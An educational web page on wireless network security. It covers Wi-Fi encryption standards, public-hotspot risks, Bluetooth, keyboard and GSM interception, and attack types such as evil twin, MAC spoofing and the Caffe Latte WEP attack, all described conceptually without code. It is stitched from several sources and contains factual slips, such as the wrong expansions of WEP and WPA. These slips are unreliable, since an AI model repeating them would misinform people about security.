HackersgymHackersgym
Wireless Network Security
Wireless network security is the process of designing, implementing and ensuring security on a wireless computer network. It is a subset of network security that adds protection for a wireless computer network.
Wireless network security is also known as wireless security.
Wireless network security primarily protects a wireless network from unauthorized and malicious access attempts. Typically, wireless network security is delivered through wireless devices (usually a wireless router/switch) that encrypts and secures all wireless communication by default. Even if the wireless network security is compromised, the hacker is not able to view the content of the traffic/packet in transit. Moreover, wireless intrusion detection and prevention systems also enable protection of a wireless network by alerting the wireless network administrator in case of a security breach.
Some of the common algorithms and standards to ensure wireless network security are Wired Equivalent Policy (WEP) and Wireless Protected Access (WPA).
To secure the wireless connection, we should focus on the following areas –
Identify endpoint of wireless network and end-users i.e., Authentication.
Protecting wireless data packets from middleman i.e., Privacy.
Keeping the wireless data packets intact i.e., Integrity.
We know that wireless clients form an association with Access Points (AP) and transmit data back and forth over the air. As long as all wireless devices follow 802.11 standards, they all coexist. But all wireless devices are not friendly and trustworthy, some rogue devices may be a threat to wireless security. Rogue devices can steal our important data or can cause the unavailability of the network.
Wireless security is ensured by following methods-
Authentication
Privacy and Integrity
For wireless data transmitting over the air, open authentication provides no security.
WEP uses the RC4 cipher algorithm for making every frame encrypted. The RC4 cipher also encrypts data at the sender side and decrypt data at the receiving site, using a string of bits as key called WEP key.
WEP key can be used as an authentication method or encryption tool. A client can associate with AP only if it has the correct WEP key. AP tests the knowledge of the WEP key by using a challenge phrase. The client encrypts the phrase with his own key and send back to AP. AP compares the received encrypted frame with his own encrypted phrase. If both matches, access to the association is granted.
In WEP authentication, authentication of the wireless clients takes place locally at AP. But Scenario gets changed with 802.1x. A dedicated authentication server is added to the infrastructure. There is the participation of three devices –
1.Supplicant –
Device requesting access.
2.Authenticator –
Device that provides access to network usually a Wlan controller (WLC).
3.Authentication Server –
Device that takes client credentials and deny or grant access.
WPA2 protocol advancements
WPA2 superseded WPA in 2004. WPA2 uses the Counter Mode Cipher Block Chaining Message Authentication Code Protocol (CCMP). The CCMP protocol is based on the Advanced Encryption Standard (AES) algorithm, which provides message authenticity and integrity verification. CCMP is stronger and more reliable than WPA's original Temporal Key Integrity Protocol (TKIP).
WPA2 still has vulnerabilities, however. Primary among those vulnerabilities is the potential for unauthorized access to the enterprise wireless network. This happens when there is an invasion of an attack vector on certain Wi-Fi Protected Setup (WPS) access points. It is recommended the WPS be disabled for each attack vector access point in WPA2 to discourage such threats. Other vulnerabilities exist in WPA2 as well, such as in Transport Layer Security, which threat actors can target using downgrade attacks.
Though these threats have traditionally been directed at enterprise wireless systems, home wireless systems with simple passwords or default passwords can be threatened as well. Privileged accounts, such as administrator accounts, should always be supported by stronger, longer passwords, and all passwords should be changed frequently
Difference between WPA and WEP
WEP is a security protocol specified in the 802.11b standard. WEP provides a wireless local area network with security and privacy capabilities equivalent to a wired LAN.
The standard 64-bit WEP uses a 40-bit key, although a 128-bit WEP using a 104-bit key size can also be used. WEP also uses two forms of authentication -- Open System Authentication (OSA) and Shared Key Authentication (SKA). OSA allows any client to authenticate with the access point, as long as the client has the correct WEP keys. SKA sends the WEP key in a four-step handshake. The handshake uses a challenge-response authentication method, where the client and access point send requests and encrypt data.
In 2003, the Wi-Fi Alliance announced the supersession of WEP in favor of WPA. Software updates that allow both server and client computers to implement WPA became widely available that same year. Access points can operate in a mixed WEP/WPA mode to support both WEP and WPA clients. However, mixed-mode effectively provides only WEP-level security for all users.
WPA brought about a major change in the security of wireless communications. Learn more about the future of this rapidly changing industry as Wi-Fi 6 and 5G bring about new advances and potential shortcomings.
WPA vs. WPA2 vs. WPA3: When to use them
The different WPA versions of WPA have over time increased the security standards for devices with wireless internet connections. One way to compare the three versions is to see how WPA and WPA3 stack up against WPA2.
WPA3 vs. WPA2
WPA3 is more secure and comprehensive than WPA2; however, the Wi-Fi Alliance still supports and updates the WPA2 protocol.WPA3's notable features over WPA2 include the SAE protocol, individualized data encryption, bigger session keys and stronger brute force attack protection.
WPA3's GCMP-256 data encryption is stronger than WPA2's 128-bit encryption. WPA3 also supports larger session key sizes than WPA2, with 192-bit security in enterprise use cases. WPA3 also protects against offline password guesses by allowing a user only one guess. The user would have to interact with the Wi-Fi network device directly every time they want to guess the password. WPA2, by comparison, lacks this ability, making brute force attacks a bigger threat.
Whether it’s a home or business network, the risks to an unsecured wireless network are the same. Some of the risks include:
If you fail to secure your wireless network, anyone with a wireless-enabled computer in range of your access point can use your connection. The typical indoor broadcast range of an access point is 150–300 feet. Outdoors, this range may extend as far as 1,000 feet. So, if your neighborhood is closely settled, or if you live in an apartment or condominium, failure to secure your wireless network could open your internet connection to many unintended users. These users may be able to conduct illegal activity, monitor and capture your web traffic, or steal personal files.
Wardriving is a specific kind of piggybacking. The broadcast range of a wireless access point can make internet connections available outside your home, even as far away as your street. Savvy computer users know this, and some have made a hobby out of driving through cities and neighborhoods with a wireless-equipped computer—sometimes with a powerful antenna—searching for unsecured wireless networks. This practice is known as “wardriving.”
In an evil twin attack, an adversary gathers information about a public network access point, then sets up their system to impersonate it. The adversary uses a broadcast signal stronger than the one generated by the legitimate access point; then, unsuspecting users connect using the stronger signal. Because the victim is connecting to the internet through the attacker’s system, it’s easy for the attacker to use specialized tools to read any data the victim sends over the internet. This data may include credit card numbers, username and password combinations, and other personal information. Always confirm the name and password of a public Wi-Fi hotspot prior to use. This will ensure you are connecting to a trusted access point.
Many public access points are not secured and the traffic they carry is not encrypted. This can put your sensitive communications or transactions at risk. Because your connection is being transmitted “in the clear,” malicious actors could use sniffing tools to obtain sensitive information such as passwords or credit card numbers. Ensure that all the access points you connect to use at least WPA2 encryption.
An unsecured public wireless network combined with unsecured file sharing could allow a malicious user to access any directories and files you have unintentionally made available for sharing. Ensure that when you connect your devices to public networks, you deny sharing files and folders. Only allow sharing on recognized home networks and only while it is necessary to share items. When not needed, ensure that file sharing is disabled. This will help prevent an unknown attacker from accessing your device’s files.
In public areas malicious actors can simply glance over your shoulder as you type. By simply watching you, they can steal sensitive or personal information. Screen protectors that prevent shoulder-surfers from seeing your device screen can be purchased for little money. For smaller devices, such as phones, be cognizant of your surroundings while viewing sensitive information or entering passwords.
Not all attackers rely on gaining access to your data via wireless means. By physically stealing your device, attackers could have unrestricted access to all of its data, as well as any connected cloud accounts. Taking measures to protect your devices from loss or theft is important, but should the worst happen, a little preparation may protect the data inside. Most mobile devices, including laptop computers, now have the ability to fully encrypt their stored data—making devices useless to attackers who cannot provide the proper password or personal identification number (PIN). In addition to encrypting device content, it is also advisable to configure your device’s applications to request login information before allowing access to any cloud-based information. Last, individually encrypt or password-protect files that contain personal or sensitive information. This will afford yet another layer of protection in the event an attacker is able to gain access to your device.
If you need to access any websites that store or require the input of any sensitive information — including social networking, online shopping and online banking sites — it may be worthwhile accessing them via your mobile phone network, instead of the public Wi-Fi connection.
Make sure all of your devices are protected by a rigorous anti-malware and security solution — and ensure that it’s updated as regularly as possible.
The Wireless Industry
Wireless on its own is typically used to refer to products and services from the cellular telecommunications industry. CTIA, the Wireless Association, for example, is comprised of wireless carriers, such as Verizon, AT&T, T-Mobile, and Sprint, and cellphone manufacturers like LG and Samsung. Different wireless protocols and phone standards include CDMA, GSM, EV-DO, 3G, 4G, and 5G.
Examples of Wireless Devices
Cordless phones are wireless devices, as are TV remote controls, radios, and GPS systems. Other wireless devices include phones, tablets, Bluetooth mice and keyboards, wireless routers, and most devices that don't use wires to transmit information.
Wireless chargers are another type of wireless device. Although no data is sent through a wireless charger, it does interact with another device (like a phone) without using wires.
What is wireless mobile phone security?
Mobile Device Security refers to the measures designed to protect sensitive information stored on and transmitted by laptops, smartphones, tablets, wearables, and other portable devices. At the root of mobile device security is the goal of keeping unauthorized users from accessing the enterprise network.
Why is mobile security important?
The future of computers and communication lies with mobile devices, such as laptops, tablets and smartphones with desktop-computer capabilities. Their size, operating systems, applications and processing power make them ideal to use from any place with an internet connection. And with the expansion of ruggedized devices, the Internet of Things (IoT) and operating systems, such as Chrome OS, macOS and Windows 10, every piece of hardware that's enhanced with this software and capabilities becomes a mobile computing device.
Because mobile devices have become more affordable and portable, organizations and users have preferred to buy and use them over desktop computers. And with ubiquitous wireless internet access, all varieties of mobile devices are becoming more vulnerable to attacks and data breaches.
Authentication and authorization across mobile devices offer convenience, but increase risk by removing a secured enterprise perimeter’s constraints. For example, a smartphone’s capabilities are enhanced by multi-touch screens, gyroscopes, accelerometers, GPS, microphones, multi-megapixel cameras and ports, allowing the attachment of more devices. These new capabilities change the way users are authenticated and how authorization is provided locally to the device and the applications and services on a network. As a result, the new capabilities are also increasing the number of endpoints that need protection from cybersecurity threats.
Today cybercriminals can hack into cars, security cameras, baby monitors and implanted healthcare devices. And by 2025, there could be more than 75 billion “things” connected to the internet — including cameras, thermostats, door locks, smart TVs, health monitors, lighting fixtures and many other devices.
Basic wireless router security
Every router should have a strong password to help keep out the bad guys. Some new routers come with default passwords, but you should change these during setup. Creating a new, complex, unique password for your wireless router is easy. It should only take a couple of minutes. Specific instructions vary from one router to another, but the basic idea is this:
Wi-Fi GPS works to track your location
Wi-Fi Positioning System (WPS) is a geolocation system that relies on Wi-Fi to locate compatible devices and users. Wi-Fi often works alongside GPS to improve accuracy. Companies like Google, Apple, and Microsoft use GPS to identify Wi-Fi networks, which can then be used to find someone's device as it relates to nearby Wi-Fi.
Wi-Fi positioning is useful in urban environments, where there are many wireless networks broadcasting within the same area. It is also useful in places that are out of reach to GPS, such as tunnels, large buildings, and underground structures.
However, WPS does not work when out of range of a Wi-Fi signal; if there aren't any Wi-Fi networks around, then WPS will not work.
How Wi-Fi Location Services Work
Devices that have both GPS and Wi-Fi can be used to send information about a network's location back to a GPS service. The GPS device transmits the service set or "BSSID" (MAC address) of the access point along with the location determined by GPS.
When GPS is used to determine the location of a device, it also scans nearby networks for publicly accessible information that can be used to identify the network. Once the location and nearby networks are found, the information is recorded online.
Let's say, for example, you have full GPS access and your Wi-Fi is turned on in a grocery store. The location of the store is easily spotted because your GPS is working, so your location and some information about any nearby Wi-Fi networks are sent to the vendor (such as Google or Apple).
Later, someone else enters the grocery store with Wi-Fi on but, because there's a storm outside, they have no GPS signal. Their location can still be determined thanks to Wi-Fi network positioning. Vendors like Microsoft, Apple, and Google are always refreshing this data, using it to provide more accurate location services to users. And it is disclosed involuntarily; vendors do not need Wi-Fi passwords to locate contributing networks.
What Is Bluetooth Wireless Networking?
Bluetooth is a radio communication technology that enables low-power, short distance wireless networking between phones, computers, and other network devices.
The name Bluetooth is borrowed from King Harald Gormsson of Denmark who lived more than 1,000 years ago. The king's nickname meant "Bluetooth," supposedly because he had a dead tooth that looked blue. The Bluetooth logo is a combination of the two Scandinavian runes for the King's initials.
Bluetooth Security
As with other wireless protocols, Bluetooth has received its fair share of scrutiny over the years for network security weaknesses. Popular television dramas sometimes feature criminals pairing their Bluetooth phone to an unsuspecting victim's, where the criminal can then eavesdrop on conversations and steal private data. In real life, of course, these attacks are highly unlikely to happen and sometimes even not possible in the way they are portrayed.
While Bluetooth technology incorporates its fair share of security protections, security experts recommend turning off Bluetooth on a device when not using it to avoid any small risk that exists.
Hackers Can Spy on Wireless Keyboards From Hundreds of Feet Away
Wireless keyboards generally protect their users by encrypting the data that they send back to the computers they’re paired with. That way, even if hackers try to listen in on the data stream, they’ll get nothing but an undecipherable mess. Sometimes, however, the encryption isn’t well executed:
lets learn this thing from example
Last year, a prolific security researcher found a weakness in the encryption used by certain Microsoft keyboards, and built a small device to intercept and decode what’s being typed on them.
That’s the sort of vulnerability that Marc Newlin, a researcher at Bastille, was looking for when he set out to hack 12 popular models of wireless keyboards from brands like Hewlett-Packard, Toshiba, Radio Shack, and General Electric. What he found, though, was even more shocking than a poorly secured data connection: Some keyboards weren’t encrypting the keystrokes being tapped out on them at all.
Newlin started out by reverse-engineering the transceivers—the little USB dongles that come with wireless keyboards—to try and determine how they communicate. “I thought this was going to be just the first part of the process,” Newlin said. “It turned out after completing that step that, lo and behold, all of the keystroke data was simply being transmitted in cleartext, with no encryption whatsoever.”
Introduction to GSM security
The Global System for Mobile Communication or GSM is a wireless communication that uses digital technology and is widely deployed across the globe for mobile communications, such as mobile phones. This technology utilizes microwaves, and its signal transmission is divided by time, mostly known as Time Division Multiple Access (TDMA). In this article, I will be discussing the method that could be used to see the traffic on a GSM network and how an attacker could abuse the GSM network.
Mobile communication technology was already developed and widely used in the early 1980s. For the first time, the C-NET system was developed in Germany and Portugal by Siemens, the RC-2000 system was developed in France, and the NMT system was developed in the Netherlands and Scandinavia by Ericsson, as well as the TACS system which operates in the UK. GSM appeared in mid-1991 and eventually turned into mobile telecommunications standard for the whole of Europe, maintained by the ETSI (European Telecommunications Standards Institute) technical committee.
GSM is the most secured cellular telecommunications system available today. GSM has its security methods standardized. GSM maintains end-to-end security by retaining the confidentiality of calls and anonymity of the GSM subscriber.
Temporary identification numbers are assigned to the subscriber’s number to maintain the privacy of the user. The privacy of the communication is maintained by applying encryption algorithms and frequency hopping that can be enabled using digital systems and signalling.
Problem
The background of this issues lies in the GSM network. Due to leaking of the design of encryption in 1994, it could be attacked, such as sniffing the voice in an established communication.
Sniffing GSM In Realtime
In order to be able to sniff a GSM packet, you must have a hardware that works as a receiver. For example, the RTL-SDR with rtl2832 chip. However, this hardware has a limitation. The maximum packet capture is 16 kHz wide. In other words, not all GSM packets can be captured using this hardware.
Mobile Station Authentication
The GSM network authenticates the identity of the subscriber through the use of a challenge-response mechanism. A 128-bit Random Number (RAND) is sent to the MS. The MS computes the 32-bit Signed Response (SRES) based on the encryption of the RAND with the authentication algorithm (A3) using the individual subscriber authentication key (Ki). Upon receiving the SRES from the subscriber, the GSM network repeats the calculation to verify the identity of the subscriber.
The individual subscriber authentication key (Ki) is never transmitted over the radio channel, as it is present in the subscriber's SIM, as well as the AUC, HLR, and VLR databases. If the received SRES agrees with the calculated value, the MS has been successfully authenticated and may continue. If the values do not match, the connection is terminated and an authentication failure is indicated to the MS.
The calculation of the signed response is processed within the SIM. It provides enhanced security, as confidential subscriber information such as the IMSI or the individual subscriber authentication key (Ki) is never released from the SIM during the authentication process.
Signalling and Data Confidentiality
The SIM contains the ciphering key generating algorithm (A8) that is used to produce the 64-bit ciphering key (Kc). This key is computed by applying the same random number (RAND) used in the authentication process to ciphering key generating algorithm (A8) with the individual subscriber authentication key (Ki).
GSM provides an additional level of security by having a way to change the ciphering key, making the system more resistant to eavesdropping. The ciphering key may be changed at regular intervals as required. As in case of the authentication process, the computation of the ciphering key (Kc) takes place internally within the SIM. Therefore, sensitive information such as the individual subscriber authentication key (Ki) is never revealed by the SIM.
Encrypted voice and data communications between the MS and the network is accomplished by using the ciphering algorithm A5. Encrypted communication is initiated by a ciphering mode request command from the GSM network. Upon receipt of this command, the mobile station begins encryption and decryption of data using the ciphering algorithm (A5) and the ciphering key (Kc).
Subscriber Identity Confidentiality
To ensure subscriber identity confidentiality, the Temporary Mobile Subscriber Identity (TMSI) is used. Once the authentication and encryption procedures are done, the TMSI is sent to the mobile station. After the receipt, the mobile station responds. The TMSI is valid in the location area in which it was issued. For communications outside the location area, the Location Area Identification (LAI) is necessary in addition to the TMSI.
Wireless Network Attacks
Accidental association
Unauthorized access to company wireless and wired networks can come from a number of different methods and intents. One of these methods is referred to as “accidental association”. When a user turns on a computer and it latches on to a wireless access point from a neighboring company’s overlapping network, the user may not even know that this has occurred. However, it is a security breach in that proprietary company information is exposed and now there could exist a link from one company to the other. This is especially true if the laptop is also hooked to a wired network.
Malicious association
“Malicious associations” are when wireless devices can be actively made by crackers to connect to a company network through their cracking laptop instead of a company access point (AP). These types of laptops are known as “soft APs” and are created when a cracker runs some software that makes his/her wireless network card look like a legitimate access point. Once the cracker has gained access, he/she can steal passwords, launch attacks on the wired network, or plant trojans. Since wireless networks operate at the Layer 2 level, Layer 3 protections such as network authentication and virtual private networks (VPNs) offer no barrier. Wireless 802.1x authentications do help with protection but are still vulnerable to cracking. The idea behind this type of attack may not be to break into a VPN or other security measures. Most likely the cracker is just trying to take over the client at the Layer 2 level.
Ad-hoc networks
Ad-hoc networks can pose a security threat. Ad-hoc networks are defined as peer-to-peer networks between wireless computers that do not have an access point in between them. While these types of networks usually have little protection, encryption methods can be used to provide security.
Non-traditional networks
Non-traditional networks such as personal network Bluetooth devices are not safe from cracking and should be regarded as a security risk. Even barcode readers, handheld PDAs, and wireless printers and copiers should be secured. These non-traditional networks can be easily overlooked by IT personnel who have narrowly focused on laptops and access points.
Identity theft (MAC spoofing)
Identity theft (or MAC spoofing) occurs when a cracker is able to listen in on network traffic and identify the MAC address of a computer with network privileges. Most wireless systems allow some kind of MAC filtering to only allow authorized computers with specific MAC IDs to gain access and utilize the network. However, a number of programs exist that have network “sniffing” capabilities. Combine these programs with other software that allow a computer to pretend it has any MAC address that the cracker desires, and the cracker can easily get around that hurdle.
Man-in-the-middle attacks
A man-in-the-middle attacker entices computers to log into a computer which is set up as a soft AP (Access Point). Once this is done, the hacker connects to a real access point through another wireless card offering a steady flow of traffic through the transparent hacking computer to the real network. The hacker can then sniff the traffic. One type of man-in-the-middle attack relies on security faults in challenge and handshake protocols to execute a “de-authentication attack”. This attack forces AP-
International Journal of Multimedia and Ubiquitous Engineering Vol. 3, No. 3, July, 2008 80 connected computers to drop their connections and reconnect with the cracker’s soft AP. Man-in-the-middle attacks are enhanced by software such as LANjack and AirJack, which automate multiple steps of the process. What once required some skill can now be done by script kiddies. Hotspots are particularly vulnerable to any attack since there is little to no security on these networks.
Denial of service
A Denial-of-Service attack (DoS) occurs when an attacker continually bombards a targeted AP (Access Point) or network with bogus requests, premature successful connection messages, failure messages, and/or other commands. These cause legitimate users to not be able to get on the network and may even cause the network to crash. These attacks rely on the abuse of protocols such as the Extensible Authentication Protocol (EAP).
Network injection
In a network injection attack, a cracker can make use of access points that are exposed to non-filtered network traffic, specifically broadcasting network traffic such as “Spanning Tree” (802.1D), OSPF, RIP, and HSRP. The cracker injects bogus networking re-configuration commands that affect routers, switches, and intelligent hubs. A whole network can be brought down in this manner and require rebooting or even reprogramming of all intelligent networking devices.
Caffe Latte attack
The Caffe Latte attack is another way to defeat WEP. It is not necessary for the attacker to be in the area of the network using this exploit. By using a process that targets the Windows wireless stack, it is possible to obtain the WEP key from a remote client. By sending a flood of encrypted ARP requests, the assailant takes advantage of the shared key authentication and the message modification flaws in 802.11 WEP. The attacker uses the ARP responses to obtain the WEP key in less than 6 minutes.
Which Wi-Fi protected access is the best?
WPA is now fairly out of date and can make wireless networks vulnerable to outside threats. If you have a router or a wireless access point that supports WPA, you should consider replacing it with a newer device compatible with WPA2 or WPA3.
WPA2 replaced WPA in 2004 and is now widely deployed in the enterprise space. Whilst generally safer than WPA, WPA2 is known to be vulnerable to key reinstallation attacks (KRACK) which can be exploited for the purposes of stealing data transmitted over networks.
WPA3 addresses WPA2's KRACK vulnerability with more stringent security and encryption methods. As the most up-to-date wireless encryption protocol, it is generally considered by experts to be the most secure. In practice, however, even WPA3 is not impervious to threats. You should mitigate them via regular software upgrades, including patches to your operating systems.
Keep in mind that wireless hardware manufacturers often supply their products with the security settings turned off. Make sure that you set the device up properly before using it. See 10 tips for better wireless network security.
Conclusion
Wireless networking provides numerous opportunities to increase productivity and cut costs. It also alters an organization’s overall computer security risk profile. Although it is impossible to totally eliminate all risks associated with wireless networking, it is possible to achieve a reasonable level of overall security by adopting a systematic approach to assessing and managing risk. This paper discussed the threats and vulnerabilities associated with each of the three basic technology components of wireless networks (clients, access points, and the transmission medium) and described various commonly available countermeasures that could be used to mitigate those risks. It also stressed the importance of training and educating users in safe wireless networking procedures
